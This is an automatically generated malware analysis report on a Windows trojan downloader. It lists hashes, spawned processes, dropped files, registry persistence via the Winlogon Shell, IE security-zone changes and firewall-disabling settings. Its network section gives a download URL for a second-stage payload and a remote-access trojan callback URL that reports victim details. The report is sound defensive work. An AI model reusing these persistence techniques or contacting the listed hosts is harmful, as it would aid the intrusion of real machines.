Trojan.Win32.Bumat_fc4d522d01
Trojan.Generic.69468 (BitDefender), TrojanDownloader:Win32/Delf.ZA (Microsoft), Trojan-Downloader.Win32.Agent.fne (Kaspersky), Trojan.DownLoader.65461 (DrWeb), probably a variant of Win32/TrojanDownloader.Agent (NOD32), Generic Downloader.x (McAfee), Downloader (Symantec), Trojan-Dropper.Agent (Ikarus), Trojan.Generic.69468 (FSecure), Downloader.Agent.VXG (AVG), Win32:Agent-QQF (Avast), TROJ_Generic.DIM (TrendMicro), Trojan.Win32.Bumat.FD, mzpefinder_pcap_file.YR, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-Downloader, Trojan, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: fc4d522d0194718df37ab9a324d3cb71
SHA1: a292fa44012843f67baf3ca582a2ebc3be695b29
SHA256: fe4fe2ef3a7c5a49fdded586629493ce5d002a27ced2b349a5d99dfaee96c4f9
SSDeep: 192:nDjtjvfnJis pvN9ItoiElyKeOn66peo5Ta8I4mzg5B:d7fX 5mKeOLeo5Ta8WSB
Size: 13839 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: GreatSoft
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
net1.exe:736
net1.exe:1376
%original file name%.exe:456
NET.exe:1816
NET.exe:204
fservice.exe:1360
coco1.exe:1812
HelpMe.exe:516
The Trojan injects its code into the following process(es):
No processes have been created.
File activity
The process fservice.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\services.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)
The Trojan deletes the following file(s):
%System%\fservice.exe (0 bytes)
%WinDir%\system\sservice.exe (0 bytes)
The process coco1.exe:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\HelpMe.exe (3262 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF215A.tmp (0 bytes)
%System%\HelpMe.exe (0 bytes)
The process HelpMe.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\HelpMe.exe.bat (101 bytes)
%System%\fservice.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)
Registry activity
The process net1.exe:736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 79 F1 0F 7B 6A 3C 0B 17 BA BF F3 F0 A0 D3 63"
The process net1.exe:1376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 65 8F D8 02 61 22 4B 84 03 BF 25 16 33 A2 3A"
The process %original file name%.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6F 19 62 DD 06 0C 7A C2 7C 81 AF 80 C0 64 3E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"coco1.exe" = "coco1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process NET.exe:1816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE B7 87 85 E1 D9 96 3E E9 8D 85 47 53 1D 6F A8"
The process NET.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 33 DF BD 7C DC 54 9D 3D 8A CD 20 92 3D 40 90"
The process fservice.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 DD 30 7F 8F F0 68 9C 52 E4 C3 A0 1D AF 4E C8"
The process coco1.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 36 08 FF 63 E3 83 09 5D 90 83 B8 C0 0C 40 D7"
The process HelpMe.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 2C D1 DC EC DF 97 32 DA 87 D2 9A 5C 62 6D B8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "%System%\fservice.exe"
[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = ""
"LanNotifie" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "%WinDir%\system\sservice.exe"
[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "whbuhl"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "1"
"Hata" = ""
"Port" = "4001"
"Sifre" = "032547"
"Mail" = "us`ihlnAx`inn/gs"
"ICQ_UIN2" = ""
"FW_KILL" = "1"
"Online_List" = "iuuq;..us`ihld/ushqne/bnl.bfh,cho.qsns`u/bfh"
"KSil" = "1"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe %System%\fservice.exe"
Network activity (URLs)
| URL | IP |
|---|---|
| hxxp://212.27.63.106/coco1.exe |  |
| hxxp://trahime.tripod.com/cgi-bin/prorat.cgi?bilgisayaradi=XP_&ipadresi=192.168.1.129&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=2:51:34_AM&servertarihi=2/17/2014&serversifre=123456&islem=log |  209.202.252.50 |
| mx-eu.mail.am0.yahoodns.net |  188.125.69.79 |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net1.exe:736
net1.exe:1376
%original file name%.exe:456
NET.exe:1816
NET.exe:204
fservice.exe:1360
coco1.exe:1812
HelpMe.exe:516 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\services.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)
%System%\HelpMe.exe (3262 bytes)
%System%\HelpMe.exe.bat (101 bytes)
%System%\fservice.exe (2105 bytes) - Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe %System%\fservice.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
